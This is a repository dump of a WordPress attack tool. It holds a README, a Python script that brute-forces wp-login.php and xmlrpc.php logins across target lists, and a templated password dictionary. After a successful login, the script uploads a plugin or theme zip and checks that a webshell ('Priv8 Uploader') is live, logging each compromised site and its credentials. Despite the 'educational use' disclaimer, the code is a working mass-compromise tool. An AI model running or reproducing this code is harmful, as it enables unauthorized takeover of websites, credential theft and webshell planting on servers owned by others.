├── libeay32.dll ├── ssleay32.dll ├── plugin-inmymine.zip ├── theme-inmymine.zip ├── LICENSE ├── README.md ├── main.py └── password.txt /libeay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InMyMine7/WP-Brute/HEAD/libeay32.dll -------------------------------------------------------------------------------- /ssleay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InMyMine7/WP-Brute/HEAD/ssleay32.dll -------------------------------------------------------------------------------- /plugin-inmymine.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InMyMine7/WP-Brute/HEAD/plugin-inmymine.zip -------------------------------------------------------------------------------- /theme-inmymine.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InMyMine7/WP-Brute/HEAD/theme-inmymine.zip -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License (Modified - MT License) 2 | 3 | Copyright (c) 2025 InMyMine7 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to use, 7 | copy, modify, merge, publish, and distribute copies of the Software, 8 | subject to the following conditions: 9 | 10 | 1. The Software shall be used for educational and ethical purposes only. 11 | 2. The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the Software. 13 | 3. The Software is provided "as is", without warranty of any kind, express or implied, 14 | including but not limited to the warranties of merchantability, fitness 15 | for a particular purpose and noninfringement. In no event shall the 16 | authors or copyright holders be liable for any claim, damages or other 17 | liability, whether in an action of contract, tort or otherwise, arising from, 18 | out of or in connection with the Software or the use or other dealings in the Software. 19 | 4. Users of this Software are responsible for complying with their local laws and regulations. 20 | 21 | Repository: https://github.com/InMyMine7 22 | Telegram: https://t.me/minsepen 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # XMLRPC & WPLOGIN Bruteforce + Auto Upload 2 | 3 | This tool is designed for security researchers and penetration testers to test the security of WordPress websites. It attempts to brute-force login credentials using both the wp-login.php and xmlrpc.php methods and, upon successful login, uploads a specified plugin and/or theme. 4 | 5 | **Disclaimer:** This tool is for **educational and authorized testing purposes only**. Unauthorized use on systems you do not own or have permission to test is illegal and unethical. The author is not responsible for any misuse or damage caused by this tool. 6 | 7 | ## Features 8 | - Asynchronous bruteforce with `asyncio` + `httpx` 9 | - Supports login via `wp-login.php` and `xmlrpc.php` 10 | - Checks if a target website is a WordPress site. 11 | - Brute-forces login credentials using a provided password list with various transformations. 12 | - Uploads a specified plugin and/or theme upon successful login. 13 | - Verifies the uploaded plugin or theme by checking for specific strings. 14 | - Loads local OpenSSL DLLs on Windows for SSL compatibility. 15 | - Bypasses SSL verification for flexibility in testing environments. 16 | 17 | ## Requirements 18 | 19 | - Python 3.7 or higher 20 | - Required Python libraries: 21 | - `httpx` 22 | - `colorama` 23 | - `requests` 24 | - `asyncio` 25 | - `ssl` 26 | - `ctypes` (for Windows users) 27 | 28 | You can install the required libraries using pip: 29 | 30 | ```bash 31 | pip install httpx colorama requests 32 | ``` 33 | 34 | ## Usage 35 | 36 | 1. **Prepare the target list file:** Create a text file containing the list of target websites, one per line. For example: 37 | 38 | ``` 39 | http://example.com 40 | http://anotherexample.com 41 | ``` 42 | 43 | 2. **Prepare the password list file:** Create a text file containing the list of passwords to try. The tool supports placeholders in the passwords that will be replaced with transformations of the username and domain. For example: 44 | 45 | ``` 46 | [WPLOGIN]123 47 | password[DOMAIN] 48 | [YEAR]admin 49 | ``` 50 | 51 | Available placeholders: 52 | 53 | - `[WPLOGIN]`: Replaced with the username. 54 | - `[UPPERLOGIN]`: Replaced with the username in uppercase. 55 | - `[DOMAIN]`: Replaced with the domain name without the TLD. 56 | - `[DDOMAIN]`: Replaced with the full domain name. 57 | - `[YEAR]`: Replaced with the current year. 58 | - `[UPPERALL]`: Replaced with the username in uppercase. 59 | - `[LOWERALL]`: Replaced with the username in lowercase. 60 | - `[UPPERONE]`: Replaced with the username capitalized. 61 | - `[LOWERONE]`: Replaced with the first letter lowercase and the rest uppercase. 62 | - `[AZDOMAIN]`: Replaced with the domain name without special characters. 63 | - `[REVERSE]`: Replaced with the reversed username. 64 | - `[DVERSE]`: Replaced with the reversed domain name without TLD. 65 | - `[UPPERDO]`: Replaced with the domain name capitalized without TLD. 66 | - `[UPPERDOMAIN]`: Replaced with the full domain name in uppercase. 67 | 68 | 3. **Prepare the plugin and theme zip files:** The tool looks for `plugin-inmymine.zip` and `theme-inmymine.zip` in the same directory as the script. These should be the zip files you want to upload upon successful login. 69 | 70 | 4. **Run the script:** Execute the script using Python: 71 | 72 | ```bash 73 | python main.py 74 | ``` 75 | 76 | You will be prompted to enter the path to the target list file and the password list file. 77 | 78 | 5. **Output:** The tool will output the results to the console and save successful logins to `success.txt`. If uploads fail, the site will be logged in `failed.txt`. Uploaded plugins and themes will be saved in `plugins.txt` and `themes.txt`, respectively. 79 | 80 | ## example 81 | ```bash 82 | [INFO] OpenSSL Version: OpenSSL 1.1.1 83 | Enter target list file: x.txt 84 | Enter password list file: password.txt 85 | [found username] http://example.com: ['admin'] 86 | [FAIL] http://example.com -> admin:password123 87 | [SUCCESS] http://example.com -> admin:admin2025 88 | [UPLOAD SUCCESS] Plugin: http://example.com/wp-content/plugins/random123/install.php 89 | ``` 90 | ## How It Works 91 | 92 | 1. **WordPress Detection:** The tool checks if the target site has a `wp-login.php` page and looks for specific strings to confirm it's a WordPress site. 93 | 2. **Username Enumeration:** It attempts to retrieve usernames from the WordPress REST API endpoint `/wp-json/wp/v2/users`. Falls back to default username (admin) if enumeration fails 94 | 3. **Brute-Force Login:** For each username, it tries each password in the list, applying transformations based on the placeholders. It attempts to log in using both the wp-login.php and xmlrpc.php methods. 95 | 4. **Upload Plugin/Theme:** Upon successful login, it uploads the specified plugin and/or theme zip files using the WordPress admin interface. 96 | 5. **Verification:** It checks if the uploaded plugin or theme is active by verifying specific strings in the response from the uploaded file's URL. 97 | 98 | ## Contributing 99 | 100 | Contributions are welcome! Please feel free to submit a pull request or open an issue for any bugs or feature requests. 101 | 102 | 1. Fork this repository. 103 | 2. Create a pull request with your changes. 104 | 3. Report bugs or suggestions via GitHub issues. 105 | 106 | ## License 107 | 108 | This project is licensed under the MIT License. 109 | 110 | ## Contact 111 | 112 | For any inquiries, you can reach me at: 113 | 114 | - GitHub: InMyMine7 115 | - Telegram: t.me/minsepen 116 | 117 | --- 118 | 119 | **Note:** This tool is for educational and testing purposes only. Always ensure you have permission before testing any website. -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import ctypes 4 | import ssl 5 | import asyncio 6 | import httpx 7 | import warnings 8 | import re 9 | import random 10 | from urllib.parse import urlparse 11 | import datetime 12 | import requests 13 | from colorama import Fore, init, Style 14 | warnings.filterwarnings("ignore") 15 | init(autoreset=True) 16 | g = Fore.GREEN + Style.BRIGHT 17 | y = Fore.YELLOW + Style.BRIGHT 18 | wh = Fore.WHITE + Style.BRIGHT 19 | res = Style.RESET_ALL 20 | 21 | 22 | banner = f"""{g} 23 | __ __ ____ ____ ____ __ __ ______ ___ 24 | | |__| || \ | \ | \| | || | / _] 25 | | | | || o ) | o )| D ) | || | / [_ 26 | | | | || _/ | || /| | ||_| |_|| _] 27 | | ` ' || | | O || \| : | | | | [_ 28 | \ / | | | || . \ | | | | | 29 | \_/\_/ |__| |_____||__|\_|\__,_| |__| |_____| 30 | 31 | {wh}[{g}+{wh}] XMLRPC & WPLOGIN Bruteforce + Auto Upload Made with 💖 By '/Mine7 32 | {wh}[{g}+{wh}] github.com/InMyMine7 33 | {wh}[{g}+{wh}] t.me/minsepen {res} 34 | 35 | """ 36 | def load_local_ssl(): 37 | dll_dir = os.path.dirname(os.path.abspath(__file__)) 38 | try: 39 | if os.name == 'nt': 40 | ctypes.WinDLL(os.path.join(dll_dir, 'libeay32.dll')) 41 | ctypes.WinDLL(os.path.join(dll_dir, 'ssleay32.dll')) 42 | print("[INFO] Loaded local OpenSSL DLLs.") 43 | except Exception as e: 44 | print(f"[WARNING] Gagal load OpenSSL DLL lokal: {e}") 45 | 46 | load_local_ssl() 47 | 48 | def verify_shell(url): 49 | try: 50 | resp = requests.get(url, timeout=10) 51 | if any(x in resp.text for x in ["InMyMine7", "Priv8 Uploader", " 106 | 107 | wp.getUsersBlogs 108 | 109 | {username} 110 | {password} 111 | 112 | 113 | """ 114 | headers = {'Content-Type': 'text/xml'} 115 | try: 116 | r = await client.post(f"{url}/xmlrpc.php", data=xml_body.strip(), headers=headers, timeout=15) 117 | return "isAdmin" in r.text or "blogName" in r.text 118 | except: 119 | return False 120 | 121 | async def get_usernames(self, client, url): 122 | try: 123 | headers = {'User-Agent': random.choice(USER_AGENTS)} 124 | r = await client.get(f"{url}/wp-json/wp/v2/users", headers=headers, timeout=15) 125 | usernames = re.findall(r'"slug":"(.*?)"', r.text) 126 | if not usernames: 127 | print(f"[username not found] {url}") 128 | return [] 129 | print(f"[found username] {url}: {usernames}") 130 | return usernames 131 | except: 132 | print(f"[ERROR ON] {url}") 133 | return [] 134 | 135 | async def upload_file(self, client, url, file_path, file_type): 136 | try: 137 | if file_type == "plugin": 138 | form_url = f"{url}/wp-admin/plugin-install.php?tab=upload" 139 | post_url = f"{url}/wp-admin/update.php?action=upload-plugin" 140 | form_field = "pluginzip" 141 | submit_field = "install-plugin-submit" 142 | folder_path = "wp-content/plugins/" 143 | output_file = "plugins.txt" 144 | else: 145 | form_url = f"{url}/wp-admin/theme-install.php?tab=upload" 146 | post_url = f"{url}/wp-admin/update.php?action=upload-theme" 147 | form_field = "themezip" 148 | submit_field = "install-theme-submit" 149 | folder_path = "wp-content/themes/" 150 | output_file = "themes.txt" 151 | 152 | r = await client.get(form_url, timeout=15) 153 | nonce_match = re.search(r'name="_wpnonce" value="(.*?)"', r.text) 154 | if not nonce_match: 155 | print(f"[FAILED] Tidak dapat ambil nonce dari {url}") 156 | return False 157 | 158 | nonce = nonce_match.group(1) 159 | random_filename = random_name() + ".zip" 160 | 161 | with open(file_path, "rb") as f: 162 | files = { 163 | form_field: (random_filename, f, "application/zip") 164 | } 165 | data = { 166 | '_wpnonce': nonce, 167 | '_wp_http_referer': f"/wp-admin/{'plugin' if file_type == 'plugin' else 'theme'}-install.php?tab=upload", 168 | submit_field: 'Install Now' 169 | } 170 | headers = {'User-Agent': random.choice(USER_AGENTS)} 171 | r = await client.post(post_url, data=data, files=files, headers=headers, timeout=30) 172 | 173 | if "successfully" in r.text.lower(): 174 | name = os.path.splitext(random_filename)[0] 175 | full_url = f"{url}/{folder_path}{name}/install.php" 176 | if verify_shell(full_url): 177 | print(f"[SUCCESS] Plugin berhasil di-inject dan aktif di {full_url}") 178 | print(f"[UPLOAD SUCCESS] {file_type.capitalize()}: {full_url}") 179 | with open(output_file, "a", encoding='utf-8', errors='ignore') as f: 180 | f.write(f"{full_url}\n") 181 | return True 182 | elif "already exists" in r.text: 183 | print(f"[INFO] {file_type.capitalize()} sudah ada di {url}") 184 | else: 185 | print(f"[FAILED] Upload {file_type} gagal ke {url}") 186 | except Exception as e: 187 | print(f"[ERROR] Upload {file_type} error di {url}: {e}") 188 | return False 189 | 190 | async def handle_site(self, site): 191 | url = site.strip().rstrip('/') 192 | if not url.startswith("http"): 193 | url = "http://" + url 194 | 195 | async with self.semaphore: 196 | async with httpx.AsyncClient(follow_redirects=True, verify=False) as client: 197 | if not await self.is_wordpress(client, url): 198 | print(f"[SKIP] Not a WordPress site: {url}") 199 | return 200 | 201 | usernames = await self.get_usernames(client, url) 202 | if not usernames: 203 | usernames = ["admin"] 204 | 205 | parsed_url = urlparse(url) 206 | domain = parsed_url.netloc 207 | 208 | for username in usernames: 209 | logged_in = False 210 | async for password in read_passwords_lazy(self.passwd_file): 211 | real_password = password 212 | real_password = real_password.replace("[WPLOGIN]", username) 213 | real_password = real_password.replace("[UPPERLOGIN]", username.upper()) 214 | real_password = real_password.replace("[DOMAIN]", domain.split('.')[0]) 215 | real_password = real_password.replace("[DDOMAIN]", domain) 216 | real_password = real_password.replace("[YEAR]", str(datetime.datetime.now().year)) 217 | real_password = real_password.replace("[UPPERALL]", username.upper()) 218 | real_password = real_password.replace("[LOWERALL]", username.lower()) 219 | real_password = real_password.replace("[UPPERONE]", username.capitalize()) 220 | real_password = real_password.replace("[LOWERONE]", username[0].lower() + username[1:].upper() if len(username) > 1 else username.lower()) 221 | real_password = real_password.replace("[AZDOMAIN]", re.sub(r'\W+', '', domain)) 222 | real_password = real_password.replace("[REVERSE]", username[::-1]) 223 | real_password = real_password.replace("[DVERSE]", domain.split('.')[0][::-1]) 224 | real_password = real_password.replace("[UPPERDO]", domain.capitalize().split('.')[0]) 225 | real_password = real_password.replace("[UPPERDOMAIN]", domain.upper()) 226 | 227 | 228 | success_wp = await self.try_login_wp(client, url, username, real_password) 229 | success_xmlrpc = await self.try_login_xmlrpc(client, url, username, real_password) 230 | 231 | if success_wp or success_xmlrpc: 232 | print(f"[SUCCESS] {url} -> {username}:{real_password}") 233 | with open("success.txt", "a", encoding='utf-8', errors='ignore') as f: 234 | f.write(f"{url} -> {username}:{real_password}\n") 235 | 236 | plugin_uploaded = False 237 | theme_uploaded = False 238 | 239 | if os.path.exists("plugin-inmymine.zip"): 240 | plugin_uploaded = await self.upload_file(client, url, "plugin-inmymine.zip", "plugin") 241 | if os.path.exists("theme-inmymine.zip"): 242 | theme_uploaded = await self.upload_file(client, url, "theme-inmymine.zip", "theme") 243 | 244 | if not plugin_uploaded and not theme_uploaded: 245 | with open("failed.txt", "a", encoding='utf-8', errors='ignore') as f: 246 | f.write(f"{url}#upload_failed\n") 247 | logged_in = True 248 | break 249 | else: 250 | print(f"[FAIL] {url} -> {username}:{real_password}") 251 | if logged_in: 252 | break 253 | 254 | async def run(self): 255 | tasks = [self.handle_site(site) for site in self.targets] 256 | await asyncio.gather(*tasks) 257 | 258 | def read_file(filename): 259 | with open(filename, encoding='utf-8', errors='ignore') as f: 260 | return [line.strip() for line in f if line.strip()] 261 | 262 | def read_passwords_lazy(filename): 263 | async def generator(): 264 | with open(filename, encoding='utf-8', errors='ignore') as f: 265 | for line in f: 266 | pw = line.strip() 267 | if pw: 268 | yield pw 269 | return generator() 270 | 271 | async def main(): 272 | clear() 273 | print(banner) 274 | print(f"[INFO] OpenSSL Version: {ssl.OPENSSL_VERSION}") 275 | 276 | target_file = input("Enter target list file: ").strip() 277 | if not target_file: 278 | print("[ERROR] No target file selected.") 279 | return 280 | if not os.path.isfile(target_file): 281 | print(f"[ERROR] File not found: {target_file}") 282 | return 283 | 284 | passwd_file = input("Enter password list file: ").strip() 285 | if not passwd_file: 286 | print("[ERROR] No password file selected.") 287 | return 288 | if not os.path.isfile(passwd_file): 289 | print(f"[ERROR] File not found: {passwd_file}") 290 | return 291 | 292 | targets = read_file(target_file) 293 | brute = WPBrute(targets, passwd_file) 294 | await brute.run() 295 | 296 | if __name__ == "__main__": 297 | asyncio.run(main()) 298 | -------------------------------------------------------------------------------- /password.txt: -------------------------------------------------------------------------------- 1 | z43218765z 2 | 0192837465 3 | pass 4 | !qaz@wsx 5 | 0000 6 | 00 7 | 134679 8 | 976431 9 | 147369 10 | 369147258 11 | 369147 12 | 000000 13 | 02071976 14 | 1029384756 15 | 090909 16 | 102030 17 | 10203040 18 | 102102102 19 | 111 20 | 1111 21 | 111111 22 | 11111111111 23 | 111111a 24 | 111111q 25 | 888888888 26 | 112233 27 | 11223344 28 | 12061988 29 | 121212 30 | 123 31 | 123123 32 | kampusku 33 | informatika@123 34 | infor@123 35 | 123123123 36 | 123321 37 | 1234 38 | 12341234 39 | 12345 40 | 123450 41 | 123456 42 | 1234567 43 | 12345670 44 | 12345678 45 | 123456789 46 | 1234567890 47 | 123456a 48 | 1234abcd 49 | 1234qwer 50 | 123654 51 | 123698 52 | 123789 53 | 123abc 54 | 123mudar 55 | 123qwe 56 | 123qwe123 57 | 123qweasd 58 | 123qweasdzxc 59 | 12qw34er 60 | 12qwaszx 61 | 159753 62 | 1a2b3c4d 63 | 1q2w3e 64 | 1q2w3e4r 65 | 1q2w3e4r5t 66 | 1q2w3e4r5t6y 67 | 1qa2ws3ed 68 | 1qaz2wsx 69 | 1qaz2wsx3edc 70 | 1qazxsw2 71 | 1qazxsw23edc 72 | 213243 73 | 4dm1n 74 | 88888888 75 | 987654321 76 | @dm1n 77 | FGĞIOD 78 | P@ssw0rd 79 | QSDFGH 80 | QWERTZ 81 | 123[UPPERLOGIN] 82 | 123[WPLOGIN] 83 | !@#[WPLOGIN][YEAR] 84 | [LOWERALL] 85 | [UPPERONE] 86 | [LOWERONE] 87 | [REVERSE] 88 | [AZDOMAIN] 89 | [DDOMAIN] 90 | [DOMAIN] 91 | [DOMAIN]! 92 | [DOMAIN]!@ 93 | [DOMAIN]!@# 94 | [DOMAIN]!@#$ 95 | [DOMAIN]!@#$% 96 | [DOMAIN]0101 97 | [DOMAIN]0102 98 | [DOMAIN]012 99 | [DOMAIN]0123 100 | [DOMAIN]1 101 | [DOMAIN]11 102 | [DOMAIN]111 103 | [DOMAIN]1111 104 | [DOMAIN]12 105 | [DOMAIN]123 106 | [DOMAIN]2017 107 | [DOMAIN]2018 108 | [DOMAIN]2019 109 | [DOMAIN]999 110 | [UPPERALL] 111 | [UPPERALL]2017 112 | [UPPERALL]2018 113 | [UPPERALL]2019 114 | [UPPERLOGIN] 115 | [UPPERLOGIN]! 116 | [UPPERLOGIN]!! 117 | [UPPERLOGIN]!!! 118 | [UPPERLOGIN]!!!! 119 | [UPPERLOGIN]!@ 120 | [UPPERLOGIN]!@# 121 | [UPPERLOGIN]!@#$ 122 | [UPPERLOGIN]!@#$% 123 | [UPPERLOGIN]!@#$%^ 124 | [UPPERLOGIN]!@#$%^& 125 | [UPPERLOGIN]!@#$%^&* 126 | [UPPERLOGIN]### 127 | [UPPERLOGIN]))) 128 | [UPPERLOGIN]*** 129 | [UPPERLOGIN]0 130 | [UPPERLOGIN]00 131 | [UPPERLOGIN]000 132 | [UPPERLOGIN]0000 133 | [UPPERLOGIN]001 134 | [UPPERLOGIN]003 135 | [UPPERLOGIN]005 136 | [UPPERLOGIN]007 137 | [UPPERLOGIN]01 138 | [UPPERLOGIN]010 139 | [UPPERLOGIN]0101 140 | [UPPERLOGIN]0102 141 | [UPPERLOGIN]012 142 | [UPPERLOGIN]0123 143 | [UPPERLOGIN]1 144 | [UPPERLOGIN]10 145 | [UPPERLOGIN]1000 146 | [UPPERLOGIN]1050 147 | [UPPERLOGIN]11 148 | [UPPERLOGIN]111 149 | [UPPERLOGIN]1111 150 | [UPPERLOGIN]111111 151 | [UPPERLOGIN]112 152 | [UPPERLOGIN]1122 153 | [UPPERLOGIN]112233 154 | [UPPERLOGIN]1199 155 | [UPPERLOGIN]12 156 | [UPPERLOGIN]123 157 | [UPPERLOGIN]123123 158 | [UPPERLOGIN]123321 159 | [UPPERLOGIN]1234 160 | [UPPERLOGIN]12345 161 | [UPPERLOGIN]123456 162 | [UPPERLOGIN]1234567 163 | [UPPERLOGIN]12345678 164 | [UPPERLOGIN]123456789 165 | [UPPERLOGIN]1234567890 166 | [UPPERLOGIN]124 167 | [UPPERLOGIN]13 168 | [UPPERLOGIN]14 169 | [UPPERLOGIN]15 170 | [UPPERLOGIN]1551 171 | [UPPERLOGIN]16 172 | [UPPERLOGIN]17 173 | [UPPERLOGIN]1771 174 | [UPPERLOGIN]18 175 | [UPPERLOGIN]19 176 | [UPPERLOGIN]1900 177 | [UPPERLOGIN]1970 178 | [UPPERLOGIN]1971 179 | [UPPERLOGIN]1972 180 | [UPPERLOGIN]1973 181 | [UPPERLOGIN]1974 182 | [UPPERLOGIN]1975 183 | [UPPERLOGIN]1976 184 | [UPPERLOGIN]1977 185 | [UPPERLOGIN]1978 186 | [UPPERLOGIN]1979 187 | [UPPERLOGIN]1980 188 | [UPPERLOGIN]1981 189 | [UPPERLOGIN]1982 190 | [UPPERLOGIN]1983 191 | [UPPERLOGIN]1984 192 | [UPPERLOGIN]1985 193 | [UPPERLOGIN]1986 194 | [UPPERLOGIN]1987 195 | [UPPERLOGIN]1988 196 | [UPPERLOGIN]1989 197 | [UPPERLOGIN]199 198 | [UPPERLOGIN]1990 199 | [UPPERLOGIN]1991 200 | [UPPERLOGIN]1992 201 | [UPPERLOGIN]1993 202 | [UPPERLOGIN]1994 203 | [UPPERLOGIN]1995 204 | [UPPERLOGIN]1996 205 | [UPPERLOGIN]1997 206 | [UPPERLOGIN]1998 207 | [UPPERLOGIN]1999 208 | [UPPERLOGIN]1q2w3e4r 209 | [UPPERLOGIN]1qaz2wsx 210 | [UPPERLOGIN]20 211 | [UPPERLOGIN]2000 212 | [UPPERLOGIN]2001 213 | [UPPERLOGIN]2002 214 | [UPPERLOGIN]2003 215 | [UPPERLOGIN]2004 216 | [UPPERLOGIN]2005 217 | [UPPERLOGIN]2006 218 | [UPPERLOGIN]2007 219 | [UPPERLOGIN]2008 220 | [UPPERLOGIN]2009 221 | [UPPERLOGIN]2010 222 | [UPPERLOGIN]2011 223 | [UPPERLOGIN]2012 224 | [UPPERLOGIN]2013 225 | [UPPERLOGIN]2014 226 | [UPPERLOGIN]2015 227 | [UPPERLOGIN]2016 228 | [UPPERLOGIN]2017 229 | [UPPERLOGIN]2018 230 | [UPPERLOGIN]2019 231 | [UPPERLOGIN]2020 232 | [UPPERLOGIN]22 233 | [UPPERLOGIN]2211 234 | [UPPERLOGIN]2222 235 | [UPPERLOGIN]25 236 | [UPPERLOGIN]3 237 | [UPPERLOGIN]3000 238 | [UPPERLOGIN]3030 239 | [UPPERLOGIN]321 240 | [UPPERLOGIN]321654 241 | [UPPERLOGIN]33 242 | [UPPERLOGIN]333 243 | [UPPERLOGIN]3333 244 | [UPPERLOGIN]345 245 | [UPPERLOGIN]4 246 | [UPPERLOGIN]40 247 | [UPPERLOGIN]4000 248 | [UPPERLOGIN]404 249 | [UPPERLOGIN]4040 250 | [UPPERLOGIN]432 251 | [UPPERLOGIN]44 252 | [UPPERLOGIN]444 253 | [UPPERLOGIN]4444 254 | [UPPERLOGIN]456 255 | [UPPERLOGIN]5 256 | [UPPERLOGIN]50 257 | [UPPERLOGIN]5000 258 | [UPPERLOGIN]505 259 | [UPPERLOGIN]5050 260 | [UPPERLOGIN]543 261 | [UPPERLOGIN]55 262 | [UPPERLOGIN]5500 263 | [UPPERLOGIN]555 264 | [UPPERLOGIN]5550 265 | [UPPERLOGIN]5555 266 | [UPPERLOGIN]567 267 | [UPPERLOGIN]6 268 | [UPPERLOGIN]60 269 | [UPPERLOGIN]600 270 | [UPPERLOGIN]606 271 | [UPPERLOGIN]6060 272 | [UPPERLOGIN]654 273 | [UPPERLOGIN]66 274 | [UPPERLOGIN]666 275 | [UPPERLOGIN]6666 276 | [UPPERLOGIN]678 277 | [UPPERLOGIN]6789 278 | [UPPERLOGIN]7 279 | [UPPERLOGIN]70 280 | [UPPERLOGIN]700 281 | [UPPERLOGIN]7000 282 | [UPPERLOGIN]707 283 | [UPPERLOGIN]7070 284 | [UPPERLOGIN]765 285 | [UPPERLOGIN]77 286 | [UPPERLOGIN]777 287 | [UPPERLOGIN]78 288 | [UPPERLOGIN]789 289 | [UPPERLOGIN]79 290 | [UPPERLOGIN]8 291 | [UPPERLOGIN]80 292 | [UPPERLOGIN]800 293 | [UPPERLOGIN]808 294 | [UPPERLOGIN]8080 295 | [UPPERLOGIN]876 296 | [UPPERLOGIN]88 297 | [UPPERLOGIN]888 298 | [UPPERLOGIN]8888 299 | [UPPERLOGIN]89 300 | [UPPERLOGIN]890 301 | [UPPERLOGIN]9 302 | [UPPERLOGIN]90 303 | [UPPERLOGIN]909 304 | [UPPERLOGIN]9090 305 | [UPPERLOGIN]98 306 | [UPPERLOGIN]987 307 | [UPPERLOGIN]99 308 | [UPPERLOGIN]9988 309 | [UPPERLOGIN]999 310 | [UPPERLOGIN]9999 311 | [UPPERLOGIN]@#$%^& 312 | [UPPERLOGIN]@123 313 | [UPPERLOGIN]@@@ 314 | [UPPERLOGIN]P@ssw0rd 315 | [UPPERLOGIN][UPPERLOGIN] 316 | [UPPERLOGIN]a 317 | [UPPERLOGIN]abc123 318 | [UPPERLOGIN]admin 319 | [UPPERLOGIN]admin!@# 320 | [UPPERLOGIN]admin01 321 | [UPPERLOGIN]admin1 322 | [UPPERLOGIN]admin123 323 | [UPPERLOGIN]admin1234 324 | [UPPERLOGIN]admin12345 325 | [UPPERLOGIN]admin888 326 | [UPPERLOGIN]admin@123 327 | [UPPERLOGIN]adminadmin 328 | [UPPERLOGIN]asf 329 | [UPPERLOGIN]p@ssw0rd 330 | [UPPERLOGIN]pass 331 | [UPPERLOGIN]pass123 332 | [UPPERLOGIN]pass1234 333 | [UPPERLOGIN]password 334 | [UPPERLOGIN]password1 335 | [UPPERLOGIN]password123 336 | [UPPERLOGIN]q1w2e3r4 337 | [UPPERLOGIN]qaz 338 | [UPPERLOGIN]qazescrfv 339 | [UPPERLOGIN]qazwsx 340 | [UPPERLOGIN]qwe123 341 | [UPPERLOGIN]qweasd 342 | [UPPERLOGIN]qweasdzxc 343 | [UPPERLOGIN]qwerty 344 | [UPPERLOGIN]qwerty123 345 | [UPPERLOGIN]ricsky789.. 346 | [UPPERLOGIN]root 347 | [UPPERLOGIN]temporal 348 | [UPPERLOGIN]test 349 | [UPPERLOGIN]test1 350 | [UPPERLOGIN]test123 351 | [UPPERLOGIN]test1234 352 | [UPPERLOGIN]xmagico 353 | [UPPERLOGIN]xxx 354 | [WPLOGIN] 355 | [WPLOGIN]! 356 | [WPLOGIN]!@ 357 | [WPLOGIN]!@# 358 | [WPLOGIN]!@#$ 359 | [WPLOGIN]!@#$% 360 | [WPLOGIN]!@#$%^ 361 | [WPLOGIN]$ 362 | [WPLOGIN]0 363 | [WPLOGIN]00 364 | [WPLOGIN]000 365 | [WPLOGIN]0000 366 | [WPLOGIN]001 367 | [WPLOGIN]003 368 | [WPLOGIN]005 369 | [WPLOGIN]007 370 | [WPLOGIN]01 371 | [WPLOGIN]010 372 | [WPLOGIN]0101 373 | [WPLOGIN]0102 374 | [WPLOGIN]012 375 | [WPLOGIN]0123 376 | [WPLOGIN]0987654321 377 | [WPLOGIN]1 378 | [WPLOGIN]10 379 | [WPLOGIN]1000 380 | [WPLOGIN]11 381 | [WPLOGIN]111 382 | [WPLOGIN]1111 383 | [WPLOGIN]111111 384 | [WPLOGIN]112 385 | [WPLOGIN]1122 386 | [WPLOGIN]112233 387 | [WPLOGIN]1199 388 | [WPLOGIN]12 389 | [WPLOGIN]123 390 | [WPLOGIN]123! 391 | [WPLOGIN]123123 392 | [WPLOGIN]123321 393 | [WPLOGIN]1234 394 | [WPLOGIN]12345 395 | [WPLOGIN]1234554321 396 | [WPLOGIN]123456 397 | [WPLOGIN]123456654321 398 | [WPLOGIN]1234567 399 | [WPLOGIN]12345677654321 400 | [WPLOGIN]12345678 401 | [WPLOGIN]1234567887654321 402 | [WPLOGIN]123456789 403 | [WPLOGIN]1234567890 404 | [WPLOGIN]123q 405 | [WPLOGIN]123qwerty 406 | [WPLOGIN]124 407 | [WPLOGIN]13 408 | [WPLOGIN]14 409 | [WPLOGIN]15 410 | [WPLOGIN]1551 411 | [WPLOGIN]16 412 | [WPLOGIN]17 413 | [WPLOGIN]1771 414 | [WPLOGIN]18 415 | [WPLOGIN]19 416 | [WPLOGIN]1900 417 | [WPLOGIN]1970 418 | [WPLOGIN]1971 419 | [WPLOGIN]1972 420 | [WPLOGIN]1973 421 | [WPLOGIN]1974 422 | [WPLOGIN]1975 423 | [WPLOGIN]1976 424 | [WPLOGIN]1977 425 | [WPLOGIN]1978 426 | [WPLOGIN]1979 427 | [WPLOGIN]1980 428 | [WPLOGIN]1981 429 | [WPLOGIN]1982 430 | [WPLOGIN]1983 431 | [WPLOGIN]1984 432 | [WPLOGIN]1985 433 | [WPLOGIN]1986 434 | [WPLOGIN]1987 435 | [WPLOGIN]1988 436 | [WPLOGIN]1989 437 | [WPLOGIN]1990 438 | [WPLOGIN]1991 439 | [WPLOGIN]1992 440 | [WPLOGIN]1993 441 | [WPLOGIN]1994 442 | [WPLOGIN]1995 443 | [WPLOGIN]1996 444 | [WPLOGIN]1997 445 | [WPLOGIN]1998 446 | [WPLOGIN]1999 447 | [WPLOGIN]1q 448 | [WPLOGIN]1q2w3e4r 449 | [WPLOGIN]1qaz2wsx 450 | [WPLOGIN]1qwe 451 | [WPLOGIN]20 452 | [WPLOGIN]2000 453 | [WPLOGIN]2001 454 | [WPLOGIN]2002 455 | [WPLOGIN]2003 456 | [WPLOGIN]2004 457 | [WPLOGIN]2005 458 | [WPLOGIN]2006 459 | [WPLOGIN]2007 460 | [WPLOGIN]2008 461 | [WPLOGIN]2009 462 | [WPLOGIN]2010 463 | [WPLOGIN]2011 464 | [WPLOGIN]2012 465 | [WPLOGIN]2013 466 | [WPLOGIN]2014 467 | [WPLOGIN]2015 468 | [WPLOGIN]2016 469 | [WPLOGIN]2017 470 | [WPLOGIN]2018 471 | [WPLOGIN]2019 472 | [WPLOGIN]2020 473 | [WPLOGIN]2021 474 | [WPLOGIN]2022 475 | [WPLOGIN]2023 476 | [WPLOGIN]2024 477 | [WPLOGIN]2025 478 | [WPLOGIN]22 479 | [WPLOGIN]2211 480 | [WPLOGIN]2222 481 | [WPLOGIN]25 482 | [WPLOGIN]3 483 | [WPLOGIN]3000 484 | [WPLOGIN]3030 485 | [WPLOGIN]321 486 | [WPLOGIN]33 487 | [WPLOGIN]333 488 | [WPLOGIN]3333 489 | [WPLOGIN]345 490 | [WPLOGIN]4 491 | [WPLOGIN]40 492 | [WPLOGIN]4000 493 | [WPLOGIN]404 494 | 